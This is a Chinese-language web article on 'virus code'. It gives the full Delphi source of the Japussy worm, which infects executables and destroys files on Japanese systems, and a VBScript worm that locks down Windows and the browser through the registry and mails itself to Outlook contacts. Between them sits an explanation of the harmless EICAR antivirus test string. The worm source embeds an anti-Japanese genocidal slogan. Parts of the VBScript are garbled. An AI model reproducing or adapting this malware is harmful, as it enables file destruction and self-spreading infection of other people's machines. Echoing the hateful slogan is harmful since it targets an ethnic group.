病毒代码(病毒代码)

一、电脑病毒代码

不行的得用虚拟机才可以测试病毒代码无需下载，把下面这段代码复制到记事本里，保存为文本文件

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

熊猫烧香

ogram Japussy;

uses

Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};

const

HeaderSize= 82432;//病毒体的大小

IconOffset=$12EB8;//PE文件主图标的偏移量

//在我的Delphi5 SP1上面编译得到的大小，其它版本的Delphi可能不同

//查找2800000020的十六进制字符串可以找到主图标的偏移量

{

HeaderSize= 38912;//Upx压缩过病毒体的大小

IconOffset=$92BC;//Upx压缩过PE文件主图标的偏移量

//Upx 1.24W用法: upx-9--8086 Japussy.exe

}

IconSize=$2E8;//PE文件主图标的大小--744字节

IconTail= IconOffset+ IconSize;//PE文件主图标的尾部

ID=$44444444;//感染标记

//垃圾码，以备写入

Catchword='If a race need to be killed out, it must be Yamato.'+

'If a country need to be destroyed, it must be Japan!'+

'*** W32.Japussy.Worm.A***';

{$R*.RES}

function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;

stdcall; external'Kernel32.dll';//函数声明

var

TmpFile: string;

Si: STARTUPINFO;

Pi: PROCESS_INFORMATION;

IsJap: Boolean= False;//日文操作系统标记

{判断是否为Win9x}

function IsWin9x: Boolean;

var

Ver: TOSVersionInfo;

begin

Result:= False;

Ver.dwOSVersionInfoSize:= SizeOf(TOSVersionInfo);

if not GetVersionEx(Ver) then

Exit;

if(Ver.dwPlatformID= VER_PLATFORM_WIN32_WINDOWS) then//Win9x

Result:= True;

end;

{在流之间复制}

procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;

dStartPos: Integer; Count: Integer);

var

sCurPos, dCurPos: Integer;

begin

sCurPos:= Src.Position;

dCurPos:= Dst.Position;

Src.Seek(sStartPos, 0);

Dst.Seek(dStartPos, 0);

Dst.CopyFrom(Src, Count);

Src.Seek(sCurPos, 0);

Dst.Seek(dCurPos, 0);

end;

{将宿主文件从已感染的PE文件中分离出来，以备使用}

procedure ExtractFile(FileName: string);

var

sStream, dStream: TFileStream;

begin

try

sStream:= TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);

try

dStream:= TFileStream.Create(FileName, fmCreate);

try

sStream.Seek(HeaderSize, 0);//跳过头部的病毒部分

dStream.CopyFrom(sStream, sStream.Size- HeaderSize);

finally

dStream.Free;

end;

finally

sStream.Free;

end;

except

end;

end;

{填充STARTUPINFO结构}

procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);

begin

Si.cb:= SizeOf(Si);

Si.lpReserved:= nil;

Si.lpDesktop:= nil;

Si.lpTitle:= nil;

Si.dwFlags:= STARTF_USESHOWWINDOW;

Si.wShowWindow:= State;

Si.cbReserved2:= 0;

Si.lpReserved2:= nil;

end;

{发带毒邮件}

procedure SendMail;

begin

//哪位仁兄愿意完成之？

end;

{感染PE文件}

procedure InfectOneFile(FileName: string);

var

HdrStream, SrcStream: TFileStream;

IcoStream, DstStream: TMemoryStream;

iID: LongInt;

aIcon: TIcon;

Infected, IsPE: Boolean;

i: Integer;

Buf: array[0..1] of Char;

begin

try//出错则文件正在被使用，退出

if CompareText(FileName,'JAPUSSY.EXE')= 0 then//是自己则不感染

Exit;

Infected:= False;

IsPE:= False;

SrcStream:= TFileStream.Create(FileName, fmOpenRead);

try

for i:= 0 to$108 do//检查PE文件头

begin

SrcStream.Seek(i, soFromBeginning);

SrcStream.Read(Buf, 2);

if(Buf[0]=#80) and(Buf[1]=#69) then//PE标记

begin

IsPE:= True;//是PE文件

Break;

end;

end;

SrcStream.Seek(-4, soFromEnd);//检查感染标记

SrcStream.Read(iID, 4);

if(iID= ID) or(SrcStream.Size< 10240) then//太小的文件不感染

Infected:= True;

finally

SrcStream.Free;

end;

if Infected or(not IsPE) then//如果感染过了或不是PE文件则退出

Exit;

IcoStream:= TMemoryStream.Create;

DstStream:= TMemoryStream.Create;

try

aIcon:= TIcon.Create;

try

//得到被感染文件的主图标(744字节)，存入流

aIcon.ReleaseHandle;

aIcon.Handle:= ExtractIcon(HInstance, PChar(FileName), 0);

aIcon.SaveToStream(IcoStream);

finally

aIcon.Free;

end;

SrcStream:= TFileStream.Create(FileName, fmOpenRead);

//头文件

HdrStream:= TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);

try

//写入病毒体主图标之前的数据

CopyStream(HdrStream, 0, DstStream, 0, IconOffset);

//写入目前程序的主图标

CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);

//写入病毒体主图标到病毒体尾部之间的数据

CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize- IconTail);

//写入宿主程序

CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);

//写入已感染的标记

DstStream.Seek(0, 2);

iID:=$44444444;

DstStream.Write(iID, 4);

finally

HdrStream.Free;

end;

finally

SrcStream.Free;

IcoStream.Free;

DstStream.SaveToFile(FileName);//替换宿主文件

DstStream.Free;

end;

except;

end;

end;

{将目标文件写入垃圾码后删除}

procedure SmashFile(FileName: string);

var

FileHandle: Integer;

i, Size, Mass, Max, Len: Integer;

begin

try

SetFileAttributes(PChar(FileName), 0);//去掉只读属性

FileHandle:= FileOpen(FileName, fmOpenWrite);//打开文件

try

Size:= GetFileSize(FileHandle, nil);//文件大小

i:= 0;

Randomize;

Max:= Random(15);//写入垃圾码的随机次数

if Max< 5 then

Max:= 5;

Mass:= Size div Max;//每个间隔块的大小

Len:= Length(Catchword);

while i< Max do

begin

FileSeek(FileHandle, i* Mass, 0);//定位

//写入垃圾码，将文件彻底破坏掉

FileWrite(FileHandle, Catchword, Len);

Inc(i);

end;

finally

FileClose(FileHandle);//关闭文件

end;

DeleteFile(PChar(FileName));//删除之

except

end;

end;

{获得可写的驱动器列表}

function GetDrives: string;

var

DiskType: Word;

D: Char;

Str: string;

i: Integer;

begin

for i:= 0 to 25 do//遍历26个字母

begin

D:= Chr(i+ 65);

Str:= D+':';

DiskType:= GetDriveType(PChar(Str));

//得到本地磁盘和网络盘

if(DiskType= DRIVE_FIXED) or(DiskType= DRIVE_REMOTE) then

Result:= Result+ D;

end;

end;

{遍历目录，感染和摧毁文件}

procedure LoopFiles(Path, Mask: string);

var

i, Count: Integer;

Fn, Ext: string;

SubDir: TStrings;

SearchRec: TSearchRec;

Msg: TMsg;

function IsValidDir(SearchRec: TSearchRec): Integer;

begin

if(SearchRec.Attr'.') and

(SearchRec.Name>'..') then

Result:= 0//不是目录

else if(SearchRec.Attr= 16) and(SearchRec.Name>'.') and

(SearchRec.Name>'..') then

Result:= 1//不是根目录

else Result:= 2;//是根目录

end;

begin

if(FindFirst(Path+ Mask, faAnyFile, SearchRec)= 0) then

begin

repeat

PeekMessage(Msg, 0, 0, 0, PM_REMOVE);//调整消息队列，避免引起怀疑

if IsValidDir(SearchRec)= 0 then

begin

Fn:= Path+ SearchRec.Name;

Ext:= UpperCase(ExtractFileExt(Fn));

if(Ext='.EXE') or(Ext='.SCR') then

begin

InfectOneFile(Fn);//感染可执行文件

end

else if(Ext='.HTM') or(Ext='.HTML') or(Ext='.ASP') then

begin

//感染HTML和ASP文件，将Base64编码后的病毒写入

//感染浏览此网页的所有用户

//哪位大兄弟愿意完成之？

end

else if Ext='.WAB' then//Outlook地址簿文件

begin

//获取Outlook邮件地址

end

else if Ext='.ADC' then//Foxmail地址自动完成文件

begin

//获取Foxmail邮件地址

end

else if Ext='IND' then//Foxmail地址簿文件

begin

//获取Foxmail邮件地址

end

else

begin

if IsJap then//是倭文操作系统

begin

if(Ext='.DOC') or(Ext='.XLS') or(Ext='.MDB') or

(Ext='.MP3') or(Ext='.RM') or(Ext='.RA') or

(Ext='.WMA') or(Ext='.ZIP') or(Ext='.RAR') or

(Ext='.MPEG') or(Ext='.ASF') or(Ext='.JPG') or

(Ext='.JPEG') or(Ext='.GIF') or(Ext='.SWF') or

(Ext='.PDF') or(Ext='.CHM') or(Ext='.AVI') then

SmashFile(Fn);//摧毁文件

end;

end;

end;

//感染或删除一个文件后睡眠200毫秒，避免CPU占用率过高引起怀疑

Sleep(200);

until(FindNext(SearchRec)> 0);

end;

FindClose(SearchRec);

SubDir:= TStringList.Create;

if(FindFirst(Path+'*.*', faDirectory, SearchRec)= 0) then

begin

repeat

if IsValidDir(SearchRec)= 1 then

SubDir.Add(SearchRec.Name);

until(FindNext(SearchRec)> 0);

end;

FindClose(SearchRec);

Count:= SubDir.Count- 1;

for i:= 0 to Count do

LoopFiles(Path+ SubDir.Strings+'', Mask);

FreeAndNil(SubDir);

end;

{遍历磁盘上所有的文件}

procedure InfectFiles;

var

DriverList: string;

i, Len: Integer;

begin

if GetACP= 932 then//日文操作系统

IsJap:= True;//去死吧！

DriverList:= GetDrives;//得到可写的磁盘列表

Len:= Length(DriverList);

while True do//死循环

begin

for i:= Len downto 1 do//遍历每个磁盘驱动器

LoopFiles(DriverList+':','*.*');//感染之

SendMail;//发带毒邮件

Sleep(1000* 60* 5);//睡眠5分钟

end;

end;

{主程序开始}

begin

if IsWin9x then//是Win9x

RegisterServiceProcess(GetCurrentProcessID, 1)//注册为服务进程

else//WinNT

begin

//远程线程映射到Explorer进程

//哪位兄台愿意完成之？

end;

//如果是原始病毒体自己

if CompareText(ExtractFileName(ParamStr(0)),'Japussy.exe')= 0 then

InfectFiles//感染和发邮件

else//已寄生于宿主程序上了，开始工作

begin

TmpFile:= ParamStr(0);//创建临时文件

Delete(TmpFile, Length(TmpFile)- 4, 4);

TmpFile:= TmpFile+#32+'.exe';//真正的宿主文件，多一个空格

ExtractFile(TmpFile);//分离之

FillStartupInfo(Si, SW_SHOWDEFAULT);

CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,

0, nil,'.', Si, Pi);//创建新进程运行之

InfectFiles;//感染和发邮件

end;

end

二、求简单的病毒代码

本代码尽管测试，无任何危险。病毒文件测试代码。使用方法如下：

This is not a real virus. It is a text file that is used to test antivirus software.

测试代码：

---------------------请复制下面的代码到文本中保存-------------------

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

---------------------请复制上面的代码到文本中保存-------------------

测试方法：

1.鼠标右键点击桌面空白处，创建一个“文本文档”。（什么，还不会建？我倒）

2.将下面这段测试代码复制到“文本”里，保存，然后可以直接右键点击这个文本，用杀毒软件扫描（图1）。也可以等一会，如果你的杀毒软件还行，会自动报毒并将该文本删除，那就可以初步放心了。

测试原理：

该段代码是欧洲计算机防病毒协会开发的一种病毒代码，其中的特征码已经包含在各种杀毒软件的病毒代码库里，所以可以用做测试病毒扫描引擎。

测试等级:

特等：复制完代码后便提示内存有病毒

优等：刚保存完就提示病毒(或者直接删除)

中等：保存后几秒提示病毒(或者直接删除)

下等：需自己启动病毒扫描查杀才提示病毒(或者直接删除)

劣等：无论怎么扫描都无法提示病毒(或者直接删除)

三、电脑病毒源代码介绍

电脑中了病毒想从它的源代码入手怎么办呢!有我在，下面由我给你做出详细的电脑病毒源代码介绍!希望对你有帮助!

电脑病毒源代码介绍：

电脑病毒源代码一：

on error resume next

set fs=createobject("ing.filesystemobject"'创建一个能与操作系统沟通的对象,再利用该对象的各种方法对注册表进行操作

set dir1=fs.getspecialfolder(0)'获取windows/winnt文件夹位置

set dir2=fs.getspecialfolder(1)'获取system32/system文件夹位置

set so=createobject("ing.filesystemobject"

dim r'定义一个变量

set r=createobject("w.shell"

so.getfile(w.fullname).copy(dir1&"\win32system.vbs"'复制病毒副本到windows/winnt文件夹位置

so.getfile(w.fullname).copy(dir2&"\win32system.vbs"'复制病毒副本到system32/system文件夹位置

so.getfile(w.fullname).copy(dir1&"\start menu\programs\启动\win32system.vbs"'复制病毒副本到start menu启动菜单

'下面是对注册表的恶意修改和简单的依靠oe传播

r.regwrite"hkcu\software\microsoft\windows\currentversion\policies\explorer\norun",1,"reg_dword"'修改注册表，禁止“运行”菜单

r.regwrite"kcu\software\microsoft\windows\currentversion\policies\explorer\noclose",1,"reg_dword"'修改注册表，禁止“关闭”菜单

r.regwrite"hkcu\software\microsoft\windows\currentversion\policies\explorer\nodrives",63000000,"reg_dword"'修改注册表，隐藏所有逻辑盘符

r.regwrite"hkcu\software\microsoft\windows\currentversion\policies\system\disableregistrytools",1,"reg_dword"'修改注册表，禁止注册表编辑

r.regwrite"hklm\software\microsoft\windows\currentversion\run\scanregistry",""'修改注册表，禁止开机注册表扫描

r.regwrite"hkcu\software\microsoft\windows\currentversion\policies\explorer\nologoff",1,"reg_dword"'修改注册表，禁止“注销”菜单

r.regwrite"hkcu\software\microsoft\windows\currentversion\policies\winoldapp\norealmode",1,"reg_dword"'修改注册表，禁止ms-dos实模式

r.regwrite"hklm\software\microsoft\windows\currentversion\run\win32system","win32system.vbs"'修改注册表，使这个脚本本身开机自动运行

r.regwrite"hkcu\software\microsoft\windows\currentversion\policies\explorer\nodesktop",1,"reg_dword"'修改注册表，禁止显示桌面图标

r.regwrite"hkcu\software\microsoft\windows\currentversion\policies\winoldapp\disabled",1,"reg_dword"'修改注册表，禁止纯dos模式

r.regwrite"hkcu\software\microsoft\windows\currentversion\policies\explorer\nosettaskbar",1,"reg_dword"'修改注册表，禁止“任务栏和开始”菜单

r.regwrite"hkcu\software\microsoft\windows\currentversion\policies\explorer\noviewcontextmenu",1,"reg_dword"'修改注册表，禁止右键菜单

电脑病毒源代码二：

r.regwrite"hkcu\software\microsoft\windows\currentversion\policies\explorer\nosetfolders",1,"reg_dword"'修改注册表，禁止控制面板

r.regwrite"hklm\software\classes\.reg\","txtfile"'修改注册表，禁止导入使用.reg文件，改为用txt文件的关联

r.regwrite"hklm\software\microsoft\windows\currentversion\winlogon\legalnoticecaption","警告"'设置开机提示框标题

r.regwrite"hklm\software\microsoft\windows\currentversion\winlogon\legalnoticetext","您中vbs脚本病毒了，哭吧~"'设置开机提示框文本内容

set ol=createobject("outlook.application"'创建outlook文件对象用于传播

on error resume next

for x=1 to 100

set mail=ol.createitem(0)

mail.to=ol.getnamespace("mapi".addresslists(1).addressentries(x)'用于向地址簿的前100名发送此 vbs病毒，可以算是简单弱智的蠕虫了吧~~

mail.subject="今晚你来吗?"'邮件主题

mail.body="朋友你好：您的朋友rose给您发来了热情的邀请。具体情况请阅读随信附件，祝您好运!同城约会网"'邮件内容

mail.attachments.add(dir2&"win32system.vbs"

mail.send

next

ol.quit

'下面是对internet explore选项的恶意修改

r.regwrite"hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowsercontextmenu",1,"reg_dword"'修改注册表，禁止鼠标右键

r.regwrite"hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowseroptions",1,"reg_dword"'修改注册表，禁止internet选项

r.regwrite"hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowsersaveas",1,"reg_dword"'修改注册表，禁止“另存为”

r.regwrite"hkcu\software\policies\microsoft\internet explorer\restrictions\nofileopen",1,"reg_dword"'修改注册表，禁止“文件/打开”菜单

r.regwrite"hkcu\software\policies\microsoft\internet explorer\control panel\advanced",1,"reg_dword"'修改注册表，禁止更改高级页设置

r.regwrite"hkcu\software\policies\microsoft\internet explorer\control panel\cache internet",1,"reg_dword"'修改注册表，禁止更改临时文件设置

r.regwrite"hkcu\software\policies\microsoft\internet explorer\control panel\autoconfig",1,"reg_dword"'修改注册表，禁止更改自动配置

r.regwrite"hkcu\software\policies\microsoft\internet explorer\control panel\homepage",1,"reg_dword"'修改注册表，禁止更改主页，即“主页”变灰

r.regwrite"hkcu\software\policies\microsoft\internet explorer\control panel\history",1,"reg_dword"'修改注册表，禁止更改历史记录设置

r.regwrite"hkcu\software\policies\microsoft\internet explorer\control panel\connwiz admin lock",1,"reg_dword"'修改注册表，禁止更改internet连接向导

r.regwrite"hkcu\software\policies\microsoft\internet explorer\control panel\securitytab",1,"reg_dword"'修改注册表，禁止更改安全项

r.regwrite"hkcu\software\policies\microsoft\internet explorer\control panel\resetwebsettings",1,"reg_dword"'修改注册表，禁止“重置web设置”

r.regwrite"hkcu\software\policies\microsoft\internet explorer\restrictions\noviewsource",1,"reg_dword"'修改注册表，禁止查看源文件

r.regwrite"hkcu\software\policies\microsoft\internet explorer\infodelivery\restrictions\noaddingsubions",1,"reg_dword"'修改注册表，禁止添加脱机计划